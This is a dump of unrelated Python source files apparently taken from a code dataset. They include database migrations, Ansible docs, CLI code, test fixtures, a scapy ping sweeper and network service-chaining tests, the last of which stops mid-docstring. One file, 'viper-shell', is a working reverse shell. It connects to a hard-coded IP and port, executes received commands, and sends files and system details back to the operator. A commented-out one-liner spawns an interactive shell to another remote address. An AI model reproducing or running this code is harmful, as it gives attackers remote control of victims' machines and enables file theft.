        super(DefaultName, self).__init__(config, motion_config)

    def initialize_vars(self):
        """Declare the agent's local and shared (all-write/all-read) variables."""
        self.locals = {}
        self.locals['i'] = 0
        self.locals['currentRoute'] = None
        self.locals['newTask'] = None
        # Protocol stages: asgn = picking a task, rchd = travelling to it,
        # cmplt = finished (declared but not used in loop_body below).
        self.locals['asgn'] = 0
        self.locals['rchd'] = 1
        self.locals['cmplt'] = 2
        self.locals['stage'] = 0
        self.create_aw_var('taskList', list, None)
        self.create_ar_var('routes', list, None)

    def loop_body(self):
        """One round of the assign -> travel -> reassign cycle."""
        if self.locals['stage'] == self.locals['asgn']:
            self.locals['newTask'] = self.getAvailableNextTask(self.read_from_shared('taskList', None))
            self.locals['currentRoute'] = self.getPathFromTask(self.locals['newTask'])
            if not self.willCollide(self.locals['newTask']):
                # Publish the chosen route and hand it to the motion controller.
                self.write_to_shared('routes', self.pid(), self.locals['currentRoute'])
                self.write_to_actuator('Motion.route', self.locals['currentRoute'])
                self.locals['stage'] = self.locals['rchd']
            return
        if self.locals['stage'] == self.locals['rchd'] and self.read_from_sensor('Motion.done'):
            # Destination reached: go back to picking the next task.
            self.locals['stage'] = self.locals['asgn']
            return
| StarcoderdataPython |
1658511 | """
Migration script to add the post_job_action_association table.
"""
import logging
from sqlalchemy import (
Column,
ForeignKey,
Integer,
MetaData,
Table,
)
from galaxy.model.migrate.versions.util import (
create_table,
drop_table,
)
log = logging.getLogger(__name__)
metadata = MetaData()
# Association table linking a PostJobAction to the Job it was applied to.
PostJobActionAssociation_table = Table(
    "post_job_action_association",
    metadata,
    Column("id", Integer, primary_key=True),
    Column("post_job_action_id", Integer, ForeignKey("post_job_action.id"), index=True, nullable=False),
    Column("job_id", Integer, ForeignKey("job.id"), index=True, nullable=False),
)
def upgrade(migrate_engine):
    """Create the post_job_action_association table."""
    print(__doc__)
    metadata.bind = migrate_engine
    metadata.reflect()
    create_table(PostJobActionAssociation_table)
def downgrade(migrate_engine):
    """Drop the post_job_action_association table (reverse of upgrade)."""
    metadata.bind = migrate_engine
    metadata.reflect()
    drop_table(PostJobActionAssociation_table)
| StarcoderdataPython |
1743577 | <reponame>cys3c/viper-shell
#!/usr/bin/python
#import commands
#import shutil
import socket
import subprocess
import os
import platform
import sys
# In the transfer function, we first check if the file exists in the first place, if not we will notify the attacker
# otherwise, we will create a loop where each time we iterate we will read 1 KB of the file and send it, since the
# server has no idea about the end of the file we add a tag called 'DONE' to address this issue, finally we close the file
def transfer(s,path):
if os.path.exists(path):
f = open(path, 'rb')
packet = f.read(1024)
while packet != '':
s.send(packet)
packet = f.read(1024)
s.send('DONE')
f.close()
else: # the file doesn't exist
s.send('Unable to find out the file')
def recieve(s):
print('We are receiving a file')
f = open('C:\\Temp\\test.txt', 'wb')
while True:
bits = s.recv(1024)
print(bits)
if 'File does not exist' in bits:
print('File does not exist')
break
elif bits.endswith('DONE'):
print('[+] Tansfer Complete ')
f.close()
break
else:
f.write(bits)
print('[+] Tansfer Complete ')
f.close()
break
def connect():
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.50",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.11.0.202', 8081))
while True:
command = s.recv(1024)
if 'terminate' in command:
sock.send("Connection is shutting down ..................\n\n")
s.close()
break
# if we received grab keyword from the attacker, then this is an indicator for
# file transfer operation, hence we will split the received commands into two
# parts, the second part which we interested in contains the file path, so we will
# store it into a variable called path and pass it to transfer function
# Remember the Formula is grab*<File Path>
# Example: grab*C:\Users\Ghost\Desktop\photo.jpeg
elif 'grab' in command:
grab,path = command.split('*')
try: # when it comes to low level file transfer, allot of things can go wrong, therefore
# we use exception handling (try and except) to protect our script from being crashed
# in case something went wrong, we will send the error that happened and pass the exception
transfer(s,path)
except Exception,e:
s.send ( str(e) ) # send the exception error
pass
#elif 'cd' in command:# the forumal here is gonna be cd then space then the path that we want to go to, like cd C:\Users
# code,directory = command.split(" ") # split up the received command based on space into two variables
# os.chdir(directory) # changing the directory
# # we send back a string mentioning the new CWD Note, os.getcwd should stop it from hanging
#s.send( "[+] CWD Is " + os.getcwd() )
elif 'cd' in command:
for x in command:
if 'cd*' in x:
code, command = command.split("*")
os.chdir(command)
s.send ("[+] CWD Is " + os.getcwd())
elif 'cd' in command:
code, command = command.split(" ")
os.chdir(command)
s.send ("[+] CWD Is " + os.getcwd())
elif 'getenv' in command:
s.send( "[+] Platform Is " + platform.platform())
elif 'getuid' in command:
s.send( "[+] UserID Is " + os.environ.get('USERNAME'))
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send( CMD.stdout.read() )
s.send( CMD.stderr.read() )
def main ():
connect()
main()
| StarcoderdataPython |
3226972 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2015, Ansible Project
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# Module metadata consumed by Ansible's documentation and support tooling.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['stableinterface'],
                    'supported_by': 'core'}
DOCUMENTATION = '''
---
module: package
version_added: 2.0
author:
- Ansible Inc
short_description: Generic OS package manager
description:
- Installs, upgrade and removes packages using the underlying OS package manager.
- For Windows targets, use the M(win_package) module instead.
options:
name:
description:
- "Package name, or package specifier with version, like C(name-1.0)."
- "Be aware that packages are not always named the same and this module will not 'translate' them per distro."
required: true
state:
description:
- Whether to install (C(present), or remove (C(absent)) a package. Other states depend on the underlying package module, i.e C(latest).
required: true
use:
description:
- The required package manager module to use (yum, apt, etc). The default 'auto' will use existing facts or try to autodetect it.
- You should only use this field if the automatic selection is not working for some reason.
required: false
default: auto
requirements:
- Whatever is required for the package plugins specific for each system.
notes:
- This module actually calls the pertinent package modules for each system (apt, yum, etc).
- For Windows targets, use the M(win_package) module instead.
'''
EXAMPLES = '''
- name: install ntpdate
package:
name: ntpdate
state: present
# This uses a variable as this changes per distribution.
- name: remove the apache package
package:
name: "{{ apache }}"
state: absent
'''
| StarcoderdataPython |
1705684 | #------------------------------------------------------------------------------#
# Copyright 2018 <NAME>. All rights reserved. Use of this source #
# code is governed by a MIT license that can be found in the LICENSE file. #
#------------------------------------------------------------------------------#
"""
betrack
Usage:
betrack -h | --help
betrack --version
betrack track-particles -c <file> | --configuration=<file>
betrack annotate-video
Options:
-h --help Show help screen.
--version Show betrack version.
-c <file> --configuration=<file> Specify a yml configuration file.
Examples:
betrack track-particles
Help:
For help using this tool, please open an issue on the Github repository:
https://github.com/gvalentini85/betrack-cli/issues
"""
from sys import exit
from inspect import getmembers, isclass
from docopt import docopt
from . import __cli__ as CLI
from . import __version__ as VERSION
def main():
    """Main CLI entrypoint.

    Parses argv with docopt, then dispatches to the command class whose
    module name matches the selected CLI command, and exits with the
    command's return code.
    """
    import betrack.commands
    options = docopt(__doc__, version=CLI + ' ' + VERSION)
    for (k, v) in options.items():
        # CLI flags look like 'track-particles'; command modules drop the dash.
        if hasattr(betrack.commands, k.replace('-', '')) and v:
            module = getattr(betrack.commands, k.replace('-', ''))
            # NOTE(review): this rebinds betrack.commands to a list of
            # (name, class) pairs, shadowing the package for later
            # iterations — confirm this is intentional.
            betrack.commands = getmembers(module, isclass)
            command = [command[1] for command in betrack.commands if command[0] != 'BetrackCommand'][0]
            command = command(options)
            errcode = command.run()
            exit(errcode)
| StarcoderdataPython |
3276322 | <filename>tests/conftest.py
import pytest
from pytest_factoryboy import register
from wagtail.core.models import Site
from .factories import BlogPageFactory
register(BlogPageFactory)
@pytest.fixture
def home():
    """Return the default site's root page."""
    # Root page is created by Wagtail migrations.
    return Site.objects.first().root_page
| StarcoderdataPython |
3318665 | <reponame>APrioriInvestments/typed_python
# Copyright 2017-2019 typed_python Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typed_python.compiler.type_wrappers.wrapper import Wrapper
from typed_python import _types
import typed_python.compiler
# Shorthand: map a typed_python type to its compiler type wrapper.
typeWrapper = lambda x: typed_python.compiler.python_object_representation.typedPythonTypeToTypeWrapper(x)
class BoundMethodWrapper(Wrapper):
    """Compiler wrapper for BoundMethod values.

    A bound method shares the native layout of the instance it is bound to
    (its first argument), so lifetime operations delegate to that
    instance's wrapper, and calling it dispatches a method call on the
    instance.
    """

    def __init__(self, t):
        super().__init__(t)
        # Wrapper for the instance type the method is bound to.
        self.firstArgType = typeWrapper(self.typeRepresentation.FirstArgType)

    @staticmethod
    def Make(wrapperType, attr):
        """Build a BoundMethodWrapper for attribute 'attr' of 'wrapperType'."""
        return BoundMethodWrapper(_types.BoundMethod(wrapperType.typeRepresentation, attr))

    def getNativeLayoutType(self):
        # Same native layout as the bound instance itself.
        return self.firstArgType.getNativeLayoutType()

    def convert_assign(self, context, target, toStore):
        # Delegate to the instance wrapper after a type-level reinterpret.
        return self.firstArgType.convert_assign(
            context,
            target.changeType(self.firstArgType),
            toStore.changeType(self.firstArgType)
        )

    def convert_copy_initialize(self, context, target, toStore):
        # Delegate to the instance wrapper after a type-level reinterpret.
        return self.firstArgType.convert_copy_initialize(
            context,
            target.changeType(self.firstArgType),
            toStore.changeType(self.firstArgType)
        )

    def convert_destroy(self, context, instance):
        # Destroying the bound method destroys the held instance reference.
        return self.firstArgType.convert_destroy(
            context,
            instance.changeType(self.firstArgType)
        )

    def convert_call(self, context, left, args, kwargs):
        # Calling the bound method == calling the named method on the instance.
        return self.firstArgType.convert_method_call(
            context,
            left.changeType(self.firstArgType),
            self.typeRepresentation.FuncName,
            args,
            kwargs
        )

    def convert_to_type_with_target(self, context, instance, targetVal, conversionLevel, mayThrowOnFailure=False):
        # A bound method converted to bool is always True.
        if targetVal.expr_type.typeRepresentation is bool:
            targetVal.convert_copy_initialize(context.constant(True))
            return context.constant(True)

        return super().convert_to_type_with_target(context, instance, targetVal, conversionLevel, mayThrowOnFailure)
| StarcoderdataPython |
4835056 | <gh_stars>10-100
#!/usr/bin/python
# Python 2 script: ICMP ping sweep over a file of IP addresses using scapy.
import logging
# Silence scapy's noisy runtime warnings (e.g. missing IPv6 route).
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
if len(sys.argv) != 2:
    print "Usage - ./pinger.py [filename]"
    print "Example - ./pinger.py iplist.txt"
    print "Example will perform an ICMP ping scan of the IP addresses listed in iplist.txt"
    sys.exit()
filename = str(sys.argv[1])
file = open(filename,'r')
for addr in file:
    # One echo request per address: 1 second timeout, quiet scapy output.
    ans=sr1(IP(dst=addr.strip())/ICMP(),timeout=1,verbose=0)
    if ans == None:
        # No reply: host considered down, nothing printed.
        pass
    else:
        # Reply received: report the responsive address.
        print addr.strip()
1799043 | from datetime import datetime
from capslock import run_multiple_times
@run_multiple_times(times=10)
def current_time():
    """Return the current local time formatted as HH:MM:SS.microseconds.

    Decorated with run_multiple_times(times=10); the decorator's exact
    aggregation semantics live in the capslock package — presumably it
    invokes the function repeatedly. TODO confirm.
    """
    now = datetime.now()
    return now.strftime("%H:%M:%S.%f")

if __name__ == '__main__':
    print(current_time())
158813 | from time import sleep
from common.servicechain.config import ConfigSvcChain
from common.servicechain.verify import VerifySvcChain
from common.servicechain.mirror.verify import VerifySvcMirror
from common.servicechain.mirror.config import ConfigSvcMirror
from tcutils.util import get_random_cidr
from tcutils.util import get_random_name
from common.ecmp.ecmp_traffic import ECMPTraffic
from common.ecmp.ecmp_verify import ECMPVerify
class VerifySvcFirewall(VerifySvcMirror):
    def verify_svc_span(self, in_net=False):
        """End-to-end check of transparent service chaining across SI deletion.

        Creates two VNs with a VM each, chains 3 TCP and 3 UDP bridge
        service instances between them via policy, verifies TCP/UDP flows,
        deletes the TCP chain (TCP must then fail while UDP still passes),
        recreates it and verifies both flows again.

        Args:
            in_net: when True, use in-network naming/VN wiring for the
                service templates instead of transparent defaults.
        """
        # --- Networks and end-point VMs ---------------------------------
        vn1_name = get_random_name("left_vn")
        vn1_subnets = ['192.168.3.11/24']
        vm1_name = get_random_name('left_vm')
        vn2_name = get_random_name("right_vn")
        vn2_subnets = ['172.16.17.32/24']
        vm2_name = get_random_name('right_vm')
        if in_net:
            vn1_name = get_random_name("in_left_vn")
            vn1_subnets = ['172.16.58.3/24']
            vm1_name = get_random_name('in_left_vm')
            vn2_name = get_random_name("in_right_vn")
            vn2_subnets = ['172.16.17.32/24']
            vm2_name = get_random_name('in_right_vm')
        vn1_fixture = self.config_vn(vn1_name, vn1_subnets)
        vn2_fixture = self.config_vn(vn2_name, vn2_subnets)
        vm1_fixture = self.config_vm(vn1_fixture, vm1_name)
        vm2_fixture = self.config_vm(vn2_fixture, vm2_name)
        assert vm1_fixture.verify_on_setup()
        assert vm2_fixture.verify_on_setup()
        vm1_fixture.wait_till_vm_is_up()
        vm2_fixture.wait_till_vm_is_up()
        # --- TCP service chain (3 instances) ----------------------------
        si_count = 3
        st_name = get_random_name("tcp_svc_template")
        si_prefix = "tcp_bridge_"
        policy_name = get_random_name("allow_tcp")
        if in_net:
            st_name = get_random_name("in_tcp_svc_template")
            si_prefix = "in_tcp_bridge_"
            policy_name = get_random_name("in_allow_tcp")
            tcp_st_fixture, tcp_si_fixtures = self.config_st_si(
                st_name, si_prefix, si_count,
                left_vn=vn1_name, right_vn=vn2_name)
        else:
            tcp_st_fixture, tcp_si_fixtures = self.config_st_si(
                st_name, si_prefix, si_count)
        action_list = self.chain_si(si_count, si_prefix)
        # Update rule with specific port/protocol
        rule = [{'direction': '<>',
                 'protocol': 'tcp',
                 'source_network': vn1_name,
                 'src_ports': [8000, 8000],
                 'dest_network': vn2_name,
                 'dst_ports': [9000, 9000],
                 'simple_action': None,
                 'action_list': {'apply_service': action_list}
                 }]
        # Create new policy with rule to allow traffic from the new VNs.
        tcp_policy_fixture = self.config_policy(policy_name, rule)
        self.verify_si(tcp_si_fixtures)
        # --- UDP service chain (3 instances) ----------------------------
        st_name = get_random_name("udp_svc_template")
        si_prefix = "udp_bridge_"
        policy_name = get_random_name("allow_udp")
        if in_net:
            st_name = get_random_name("in_udp_svc_template")
            si_prefix = "in_udp_bridge_"
            policy_name = get_random_name("in_allow_udp")
            udp_st_fixture, udp_si_fixtures = self.config_st_si(
                st_name, si_prefix, si_count,
                left_vn=vn1_name, right_vn=vn2_name)
        else:
            udp_st_fixture, udp_si_fixtures = self.config_st_si(
                st_name, si_prefix, si_count)
        action_list = self.chain_si(si_count, si_prefix)
        # Update rule with specific port/protocol
        rule = [{'direction': '<>',
                 'protocol': 'udp',
                 'source_network': vn1_name,
                 'src_ports': [8001, 8001],
                 'dest_network': vn2_name,
                 'dst_ports': [9001, 9001],
                 'simple_action': None,
                 'action_list': {'apply_service': action_list}
                 }]
        # Create new policy with rule to allow traffic from the new VNs.
        udp_policy_fixture = self.config_policy(policy_name, rule)
        # Attach both policies to both VNs so either protocol is chained.
        vn1_udp_policy_fix = self.attach_policy_to_vn(
            [tcp_policy_fixture, udp_policy_fixture], vn1_fixture)
        vn2_udp_policy_fix = self.attach_policy_to_vn(
            [tcp_policy_fixture, udp_policy_fixture], vn2_fixture)
        result, msg = self.validate_vn(vn1_name)
        assert result, msg
        result, msg = self.validate_vn(vn2_name)
        assert result, msg
        self.verify_si(udp_si_fixtures)
        # Install traffic package in VM
        vm1_fixture.install_pkg("Traffic")
        vm2_fixture.install_pkg("Traffic")
        # --- Both chains up: TCP and UDP flows must pass ----------------
        sport = 8001
        dport = 9001
        sent, recv = self.verify_traffic(vm1_fixture, vm2_fixture,
                                         'udp', sport=sport, dport=dport)
        errmsg = "UDP traffic with src port %s and dst port %s failed" % (
            sport, dport)
        assert sent and recv == sent, errmsg
        sport = 8000
        dport = 9000
        sent, recv = self.verify_traffic(vm1_fixture, vm2_fixture,
                                         'tcp', sport=sport, dport=dport)
        errmsg = "TCP traffic with src port %s and dst port %s failed" % (
            sport, dport)
        assert sent and recv == sent, errmsg
        # --- Delete TCP chain: UDP must still pass, TCP must fail -------
        self.delete_si_st(tcp_si_fixtures, tcp_st_fixture)
        sport = 8001
        dport = 9001
        sent, recv = self.verify_traffic(vm1_fixture, vm2_fixture,
                                         'udp', sport=sport, dport=dport)
        errmsg = "UDP traffic with src port %s and dst port %s failed" % (
            sport, dport)
        assert sent and recv == sent, errmsg
        sport = 8000
        dport = 9000
        sent, recv = self.verify_traffic(vm1_fixture, vm2_fixture,
                                         'tcp', sport=sport, dport=dport)
        errmsg = "TCP traffic with src port %s and dst port %s passed; Expected to fail" % (
            sport, dport)
        assert sent and recv == 0, errmsg
        # --- Recreate TCP chain and re-verify both flows ----------------
        st_name = get_random_name("tcp_svc_template")
        si_prefix = "tcp_bridge_"
        policy_name = get_random_name("allow_tcp")
        if in_net:
            st_name = get_random_name("in_tcp_svc_template")
            si_prefix = "in_tcp_bridge_"
            policy_name = get_random_name("in_allow_tcp")
            tcp_st_fixture, tcp_si_fixtures = self.config_st_si(
                st_name, si_prefix, si_count,
                left_vn=vn1_name, right_vn=vn2_name)
        else:
            tcp_st_fixture, tcp_si_fixtures = self.config_st_si(
                st_name, si_prefix, si_count)
        action_list = self.chain_si(si_count, si_prefix)
        result, msg = self.validate_vn(vn1_name)
        assert result, msg
        result, msg = self.validate_vn(vn2_name)
        assert result, msg
        self.verify_si(tcp_si_fixtures)
        sport = 8001
        dport = 9001
        sent, recv = self.verify_traffic(vm1_fixture, vm2_fixture,
                                         'udp', sport=sport, dport=dport)
        errmsg = "UDP traffic with src port %s and dst port %s failed" % (
            sport, dport)
        assert sent and recv == sent, errmsg
        sport = 8000
        dport = 9000
        sent, recv = self.verify_traffic(vm1_fixture, vm2_fixture,
                                         'tcp', sport=sport, dport=dport)
        errmsg = "TCP traffic with src port %s and dst port %s failed" % (
            sport, dport)
        assert sent and recv == sent, errmsg
def verify_svc_transparent_datapath(
self, si_count=1, svc_scaling=False, max_inst=1,
svc_mode='transparent',
flavor=None, proto='any', src_ports=[0, -1],
dst_ports=[0, -1], svc_img_name=None, ci=False, st_version=1):
"""Validate the service chaining datapath"""
self.mgmt_vn_name = get_random_name("mgmt_vn")
self.mgmt_vn_subnets = [get_random_cidr(af=self.inputs.get_af())]
self.mgmt_vn_fixture = self.config_vn(
self.mgmt_vn_name, self.mgmt_vn_subnets)
self.vn1_name = get_random_name('bridge_vn1')
self.vn1_subnets = [get_random_cidr(af=self.inputs.get_af())]
self.vm1_name = get_random_name('bridge_vm1')
self.vn2_name = get_random_name('bridge_vn2')
self.vn2_subnets = [get_random_cidr(af=self.inputs.get_af())]
self.vm2_name = get_random_name('bridge_vm2')
self.action_list = []
self.if_list = []
self.st_name = get_random_name('service_template_1')
si_prefix = get_random_name('bridge_si') + '_'
self.policy_name = get_random_name('policy_transparent')
self.vn1_fixture = self.config_vn(self.vn1_name, self.vn1_subnets)
self.vn2_fixture = self.config_vn(self.vn2_name, self.vn2_subnets)
if st_version == 1:
(mgmt_vn, left_vn, right_vn) = (None, None, None)
else:
(mgmt_vn, left_vn, right_vn) = (self.mgmt_vn_fixture.vn_fq_name,
self.vn1_fixture.vn_fq_name, self.vn2_fixture.vn_fq_name)
self.st_fixture, self.si_fixtures = self.config_st_si(
self.st_name, si_prefix, si_count, svc_scaling, max_inst, svc_mode=svc_mode, flavor=flavor, project=self.inputs.project_name, svc_img_name=svc_img_name, st_version=st_version, mgmt_vn=mgmt_vn, left_vn=left_vn, right_vn=right_vn)
self.action_list = self.chain_si(
si_count, si_prefix, self.inputs.project_name)
self.rules = [
{
'direction': '<>',
'protocol': proto,
'source_network': self.vn1_name,
'src_ports': src_ports,
'dest_network': self.vn2_name,
'dst_ports': dst_ports,
'simple_action': None,
'action_list': {'apply_service': self.action_list}
},
]
self.policy_fixture = self.config_policy(self.policy_name, self.rules)
self.vn1_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn1_fixture)
self.vn2_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn2_fixture)
if ci and self.inputs.get_af() == 'v4':
image_name = 'cirros-0.3.0-x86_64-uec'
else:
image_name = 'ubuntu-traffic'
self.vm1_fixture = self.config_and_verify_vm(
self.vm1_name, vn_fix=self.vn1_fixture, image_name=image_name)
self.vm2_fixture = self.config_and_verify_vm(
self.vm2_name, vn_fix=self.vn2_fixture, image_name=image_name)
result, msg = self.validate_vn(
self.vn1_name, project_name=self.inputs.project_name)
assert result, msg
result, msg = self.validate_vn(
self.vn2_name, project_name=self.inputs.project_name)
assert result, msg
if proto not in ['any', 'icmp']:
self.logger.info('Will skip Ping test')
else:
# Ping from left VM to right VM
errmsg = "Ping to Right VM %s from Left VM failed" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip, count='3'), errmsg
return True
def verify_svc_in_network_datapath(self, si_count=1, svc_scaling=False,
max_inst=1, svc_mode='in-network-nat',
flavor=None,
static_route=[None, None, None],
ordered_interfaces=True,
svc_img_name=None,
vn1_subnets=None,
vn2_fixture=None,
vn2_subnets=None,
ci=False, st_version=1):
"""Validate the service chaining in network datapath"""
self.mgmt_vn_name = get_random_name("mgmt_vn")
self.mgmt_vn_subnets = [get_random_cidr(af=self.inputs.get_af())]
self.mgmt_vn_fixture = self.config_vn(
self.mgmt_vn_name, self.mgmt_vn_subnets)
self.vn1_subnets = vn1_subnets or [
get_random_cidr(af=self.inputs.get_af())]
self.vn1_name = get_random_name("in_network_vn1")
self.vn2_name = get_random_name("in_network_vn2")
self.vm1_name = get_random_name("in_network_vm1")
self.vn2_subnets = vn2_subnets or [
get_random_cidr(af=self.inputs.get_af())]
self.vm2_name = get_random_name("in_network_vm2")
self.action_list = []
self.if_list = [['management', False, False],
['left', True, False], ['right', True, False]]
for entry in static_route:
if entry != 'None':
self.if_list[static_route.index(entry)][2] = True
self.st_name = get_random_name("in_net_svc_template_1")
si_prefix = get_random_name("in_net_svc_instance") + "_"
self.policy_name = get_random_name("policy_in_network")
self.vn1_fixture = self.config_vn(self.vn1_name, self.vn1_subnets)
if vn2_fixture is None:
self.vn2_fixture = self.config_vn(self.vn2_name, self.vn2_subnets)
else:
self.vn2_fixture = vn2_fixture
self.vn2_fq_name = vn2_fixture.vn_fq_name
self.vn2_name = self.vn2_fq_name.split(':')[2]
self.st_fixture, self.si_fixtures = self.config_st_si(
self.st_name, si_prefix, si_count, svc_scaling, max_inst, mgmt_vn=self.mgmt_vn_fixture.vn_fq_name, left_vn=self.vn1_fixture.vn_fq_name,
right_vn=self.vn2_fixture.vn_fq_name, svc_mode=svc_mode, flavor=flavor, static_route=static_route, ordered_interfaces=ordered_interfaces, svc_img_name=svc_img_name, project=self.inputs.project_name, st_version=st_version)
self.action_list = self.chain_si(
si_count, si_prefix, self.inputs.project_name)
self.rules = [
{
'direction': '<>',
'protocol': 'any',
'source_network': self.vn1_fixture.vn_fq_name,
'src_ports': [0, -1],
'dest_network': self.vn2_fixture.vn_fq_name,
'dst_ports': [0, -1],
'simple_action': None,
'action_list': {'apply_service': self.action_list}
},
]
self.policy_fixture = self.config_policy(self.policy_name, self.rules)
self.vn1_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn1_fixture)
self.vn2_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn2_fixture)
if ci and self.inputs.get_af() == 'v4' and self.inputs.orchestrator != 'vcenter':
image_name = 'cirros-0.3.0-x86_64-uec'
else:
image_name = 'ubuntu-traffic'
self.vm1_fixture = self.config_and_verify_vm(
self.vm1_name, vn_fix=self.vn1_fixture, image_name=image_name)
self.vm2_fixture = self.config_and_verify_vm(
self.vm2_name, vn_fix=self.vn2_fixture, image_name=image_name)
result, msg = self.validate_vn(
self.vn1_fixture.vn_name, project_name=self.vn1_fixture.project_name)
assert result, msg
result, msg = self.validate_vn(
self.vn2_fixture.vn_name, project_name=self.vn2_fixture.project_name, right_vn=True)
assert result, msg
# Ping from left VM to right VM
errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip), errmsg
return True
def verify_multi_inline_svc(self, si_list=[('transparent', 1), ('in-network', 1), ('in-network-nat', 1)], flavor=None, ordered_interfaces=True, vn1_subnets=None, vn2_subnets=None, st_version=1, svc_img_name=None):
"""Validate in-line multi service chaining in network datapath"""
self.mgmt_vn_name = get_random_name("mgmt_vn")
self.mgmt_vn_subnets = [get_random_cidr(af=self.inputs.get_af())]
self.mgmt_vn_fixture = self.config_vn(
self.mgmt_vn_name, self.mgmt_vn_subnets)
vn1_subnets = vn1_subnets or [get_random_cidr(af=self.inputs.get_af())]
vn2_subnets = vn2_subnets or [get_random_cidr(af=self.inputs.get_af())]
self.vn1_name = get_random_name("in_network_vn1")
self.vn1_subnets = vn1_subnets
self.vm1_name = get_random_name("in_network_vm1")
self.vn2_name = get_random_name("in_network_vn2")
self.vn2_subnets = vn2_subnets
self.vm2_name = get_random_name("in_network_vm2")
self.action_list = []
self.si_list = []
self.policy_name = get_random_name("policy_in_network")
self.vn1_fixture = self.config_vn(self.vn1_name, self.vn1_subnets)
self.vn2_fixture = self.config_vn(self.vn2_name, self.vn2_subnets)
for si in si_list:
if st_version == 1:
(mgmt_vn, left_vn, right_vn) = (None, None, None)
else:
(mgmt_vn, left_vn, right_vn) = (self.mgmt_vn_fixture.vn_fq_name,
self.vn1_fixture.vn_fq_name, self.vn2_fixture.vn_fq_name)
self.if_list = [['management', False, False],
['left', True, False], ['right', True, False]]
svc_scaling = False
si_count = 1
self.st_name = get_random_name(
("multi_sc_") + si[0] + "_" + str(si_list.index(si)) + ("_st"))
si_prefix = get_random_name(
("multi_sc_") + si[0] + "_" + str(si_list.index(si)) + ("_si")) + "_"
max_inst = si[1]
if max_inst > 1:
svc_scaling = True
svc_mode = si[0]
(mgmt_vn, left_vn, right_vn) = (
None, self.vn1_fixture.vn_fq_name, self.vn2_fixture.vn_fq_name)
if svc_mode == 'transparent':
(mgmt_vn, left_vn, right_vn) = (None, None, None)
if st_version == 2:
(mgmt_vn, left_vn, right_vn) = (self.mgmt_vn_fixture.vn_fq_name,
self.vn1_fixture.vn_fq_name, self.vn2_fixture.vn_fq_name)
self.st_fixture, self.si_fixtures = self.config_st_si(
self.st_name, si_prefix, si_count, svc_scaling, max_inst, mgmt_vn=mgmt_vn, left_vn=left_vn,
right_vn=right_vn, svc_mode=svc_mode, flavor=flavor,
ordered_interfaces=ordered_interfaces, project=self.inputs.project_name, svc_img_name=svc_img_name, st_version=st_version)
action_step = self.chain_si(
si_count, si_prefix, self.inputs.project_name)
self.action_list += action_step
self.si_list += self.si_fixtures
self.rules = [
{
'direction': '<>',
'protocol': 'any',
'source_network': self.vn1_name,
'src_ports': [0, -1],
'dest_network': self.vn2_name,
'dst_ports': [0, -1],
'simple_action': None,
'action_list': {'apply_service': self.action_list}
},
]
self.policy_fixture = self.config_policy(self.policy_name, self.rules)
self.vn1_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn1_fixture)
self.vn2_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn2_fixture)
self.vm1_fixture = self.config_and_verify_vm(
self.vm1_name, vn_fix=self.vn1_fixture)
self.vm2_fixture = self.config_and_verify_vm(
self.vm2_name, vn_fix=self.vn2_fixture)
result, msg = self.validate_vn(
self.vn1_name, project_name=self.inputs.project_name)
assert result, msg
result, msg = self.validate_vn(
self.vn2_name, project_name=self.inputs.project_name, right_vn=True)
assert result, msg
# Ping from left VM to right VM
errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip), errmsg
return True
# end verify_multi_inline_svc
    def verify_policy_delete_add(self):
        """Detach and delete the chaining policy, verify traffic is then
        blocked, re-create and re-attach it, and verify traffic flows again.

        Relies on self.policy_fixture / self.vn*_policy_fix / VM and SI
        fixtures created by a prior verify_svc_* setup call.

        Returns:
            bool: True on success; assertions abort the test on failure.
        """
        # Delete policy
        self.detach_policy(self.vn1_policy_fix)
        self.detach_policy(self.vn2_policy_fix)
        self.unconfig_policy(self.policy_fixture)
        # Ping from left VM to right VM; expected to fail
        errmsg = "Ping to right VM ip %s from left VM passed; expected to fail" % self.vm2_fixture.vm_ip
        assert self.vm1_fixture.ping_with_certainty(
            self.vm2_fixture.vm_ip, expectation=False), errmsg
        # Create policy again
        self.policy_fixture = self.config_policy(self.policy_name, self.rules)
        self.vn1_policy_fix = self.attach_policy_to_vn(
            self.policy_fixture, self.vn1_fixture)
        self.vn2_policy_fix = self.attach_policy_to_vn(
            self.policy_fixture, self.vn2_fixture)
        self.verify_si(self.si_fixtures)
        # Wait for the existing flow entry to age out, otherwise a stale
        # drop-flow from the no-policy window could fail the next ping.
        sleep(40)
        # Ping from left VM to right VM
        errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
        assert self.vm1_fixture.ping_with_certainty(
            self.vm2_fixture.vm_ip), errmsg
        return True
    def verify_protocol_port_change(self, mode='transparent'):
        """Replace the allow-all chaining policy with a tcp/8000->9001-only
        rule and verify that TCP on that port still flows while UDP is
        dropped.

        Args:
